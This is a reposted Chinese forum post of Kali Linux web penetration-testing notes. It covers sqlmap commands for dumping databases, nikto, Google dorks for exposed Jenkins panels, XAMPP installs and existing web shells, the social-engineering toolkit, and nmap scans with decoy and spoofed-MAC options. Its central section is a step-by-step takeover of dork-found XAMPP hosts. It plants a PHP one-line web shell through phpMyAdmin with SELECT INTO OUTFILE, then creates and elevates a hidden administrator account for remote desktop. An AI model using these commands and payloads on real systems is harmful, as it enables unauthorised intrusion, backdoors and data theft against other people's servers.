51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 3464|回复: 0
打印 上一主题 下一主题

[转贴] kali linux web渗透测试学习笔记

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2019-2-27 16:20:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
metasploit使用方法:启动:

第一步:启用Postgresql服务。service postgresql start

第二步:启用metasploit服务。service matasploit start

第三步:启动框架。msfconsole


一个ASP站点的sql注入测试数字型注入点

1.网址:asp?ID+13,后面加',看看是什么数据库,然后输入1=1,1=2,得到数据库是microsoft acess

2.转用sqlmap工具测试,命令:sqlmap -u 目标网址 --dbs --current-user


sqlmap拆解数据库和表名

拆解表名

命令:sqlmap -u 目标网址 --tables,线程数最大为10,基于字典拆解表名,得到的表可能不全面。


dump表数据

1.拆解一个表的列名

命令:sqlmap -u 目标网址 -T 表名 --columns


2.得到感兴趣的字段的值

命令:sqlmap -u 目标网址 -T 表名 -C 列名1,列名2,列名3 --dump


登录后台

找到登录按钮

教训:数据库密码一定要加密!


一个PHP站点的sql注入测试数字型注入点

index.php?id=1,同上,得到数据库为mysql


sqlmap拆解数据库和表名

1.扫描数据库

命令:sqlmap -u 目标网址 --dbs --current-user

2.扫描某个数据库的表

命令:sqlmap -u 目标网址 --dbms mysql-D 数据库名 --tables,参数可自行选择


dump表数据

查看表字段

同上


利用nikto帮助寻找隐藏目录,利用网页源代码中的隐藏信息寻找管理后台

命令:nikto -host 目标网站

将找到的路径放进去查看,一个个试试,附加上查看源代码,找manage

提升管理员权限:

用fiddler看看页面情况,查看系统返回的代码,编辑建立HTML文件,运行,设置fiddler(auto),将返回结果保存在本地。

返回页面


Google hack实战
能做到的事:

1.寻找持续构建工具Jenkins管理面板,有可能获取某些项目的源代码或者敏感信息;

2.综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

3.后门查找

4.关于Google hack database

Google hack语法查询:http://www.xuanhun521.com


寻找持续构建工具Jenkins(一个源代码构建工具,可以查看开发人员,项目,源代码)管理面板

1.inurl:8080 intitle:"Dashboard [Jenkins]"     造成源代码泄露


综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

寻找安装xampp的主机:inurl:"xampp/index"  intext:"XAMPP for Windows"

1)寻找phpmyadmin不用验证或者弱口令管理页面,通过mysql的root权限插入句话木马提取,获取服务器管理权限

1>>有用信息:phpinfo。可以看到网站目录;phpmyadmin管理入口,看权限菜单,添加用户

2>>连接网站的mysql服务器

          命令:mysql -u 你添加的用户名 -h 你找的网站ip -p 你添加的账户密码

         use mysql

3>>创建表

4>>向表中插入数据,其实插入的是一段命令,调用cmd并且在系统环境下执行

命令:INSERT INTO aa (packet) VALUES('<pre><body bgcolor=silver><? @sysytem($_GET["cmd"]); ?></body></pre>')

5>>select * into outfile ' / / / /aa.php ' from aa,这里的路径应该是可执行的。可以将路径粘贴下来,写如phpinfo的路径

6>>访问这个网站地址。........../aa.php

7>>好了,接下来我们前面插入的那句话就要起作用啦。试着访问........../aa.php?cmd=dir,这里可以写好多命令哦

8>>接下来创建账号cmd=net user 小明 123456 /add  ,创建成功!

9>>将我们创建的账户添加到管理员用户组cmd=net localgroup administrators 小明 /add

10>>启动mstsc,远程连接,用户名和密码就是我们刚刚创建的小明和123456


后门查找

Google搜索目标:intitle:"=[1n73ct10n privat shell]="

intitle:"WSO 2.4"[Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]


关于google hack database:

http://www.exploit-db.com/google-dorks/


SET,社会工程学工具集

SET是开源的社会工程学利用套件,通常结合metasploit来使用

进入kali,用命令setoolkit启动,选1。攻击方法:

鱼叉式钓鱼攻击(通过邮件,发送有问题邮件),网站攻击,介质感染攻击,群发邮件攻击,基于Arduino的攻击,短信欺骗攻击,无线接入点攻击,二维码攻击,powershell攻击


nmap

主机扫描:

namp -sL 103.10.87.1-255 列表扫描

nmap -PE  IP

nmap -Pn IP(不适用ping扫描,更适用于Internet)

nmap -sP IP(快速ping扫描),用来快速发现存活主机

-sn参数,只探测存活主机,不管端口啥的

尝试多种扫描方式,来扫描主机

端口扫描:

nmap -sS IP

nmap -sT IP ;TCP端口扫描

nmap -sU IP; UDP端口扫描

nmap -sU -p 80,445 IP ;指定端口

nmap -sT -v IP启用细节模式

操作系统探测:

参数:

-O(启用操作系统检测)

-osscan-limit(针对指定的目标进行操作系统检测)

--osscan-guess;--fuzzy(推测OS检测结果,在nmap不能给出确定结果的情况下使用)

示例:

nmap -sT -O IP

nmap -sT -p 3390 -O --osscan-limit IP  (只有打开3390端口,才进行操作系统版本探测)

namp -sA -O IP

服务程序探测:

nmap -sA -sV IP  扫描方式ACK ;扫描某台主机的服务程序

nmap -sV -p 22,53,110           ;扫描某个服务的服务程序

nmap高级用法:

nmap --iflist(查看本地路由与接口) 可以看到网关地址,网络接口啥的

nmap -e 08:00:27:47:63:E6 IP(指定mac和IP地址)(本地有多个网络接口时

nmap -T4 -F -n -Pn -D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.103(地址诱骗)前面地址都是虚假的,后面的才是真的

nmap -sV --spoof -mac 08:00:27:47:63:E6 IP(虚假mac地址)

nmap -sV --source-port 900 IP --source-port(指定源端口)

nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(扫描思科路由器)

nmap -sU -p69 -nvv 192.168.1.253(扫描路由器的tftp协议)

nmap -O -F -n 103.10.87.148(-F快速扫描)  扫描常见的端口

nmap --script=brute 103.10.87.148(暴力破解)



分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

本版积分规则

关闭

站长推荐上一条 /1 下一条

小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

GMT+8, 2024-11-21 21:37 , Processed in 0.060612 second(s), 23 queries .

Powered by Discuz! X3.2

© 2001-2024 Comsenz Inc.

快速回复 返回顶部 返回列表